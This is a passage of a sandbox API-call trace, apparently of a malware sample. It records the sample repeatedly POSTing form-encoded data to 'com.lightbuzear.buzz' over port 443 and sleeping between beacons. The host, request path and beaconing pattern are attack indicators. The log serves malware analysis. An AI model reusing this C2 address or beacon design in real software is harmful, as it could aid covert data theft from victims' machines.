RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f330 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0181.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f330 | out: hHeap=0x4780000) returned 1 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f358 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0181.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0181.978] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0181.978] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0181.978] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0181.978] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0bc0 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f268 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0181.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f268 | out: hHeap=0x4780000) returned 1 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481efe8 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0181.979] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3a8 [0181.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0181.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0181.980] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0181.980] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0183.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3a8 | out: hHeap=0x4780000) returned 1 [0183.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0183.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0183.138] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0183.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0183.138] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0bc0 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f380 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0183.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f010 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0183.139] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f268 [0183.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0183.140] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0183.140] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0183.140] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f268 | out: hHeap=0x4780000) returned 1 [0183.141] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0183.141] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f0b0 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0b0 | out: hHeap=0x4780000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f268 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0183.142] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0183.142] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0183.143] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0183.143] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0183.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0183.143] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0183.143] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0183.143] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0183.143] FreeLibrary (hLibModule=0x71570000) returned 1 [0183.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0183.143] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0183.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f128 | out: hHeap=0x4780000) returned 1 [0183.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f178 | out: hHeap=0x4780000) returned 1 [0183.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.144] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0183.144] Sleep (dwMilliseconds=0x2710) [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b78 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b78 | out: hHeap=0x4780000) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b78 [0183.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0183.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0183.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0183.177] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0183.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0183.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b18 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b30 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b18 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f470 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0183.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f2b8 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0183.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0b0 [0183.179] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0183.179] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0183.179] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0183.179] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0183.180] FreeLibrary (hLibModule=0x71780000) returned 1 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0b0 | out: hHeap=0x4780000) returned 1 [0183.180] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f330 [0183.180] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0bc0 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b30 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0bc0 | out: hHeap=0x4780000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0bc0 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0183.181] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3a8 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0183.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0183.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0183.182] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b30 [0183.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0183.182] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0183.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b30 | out: hHeap=0x4780000) returned 1 [0183.182] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b30 [0183.182] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0183.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0183.182] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f470 [0183.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0183.190] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.190] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f128 [0183.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0183.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0183.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0183.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0183.191] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0183.191] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f470 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 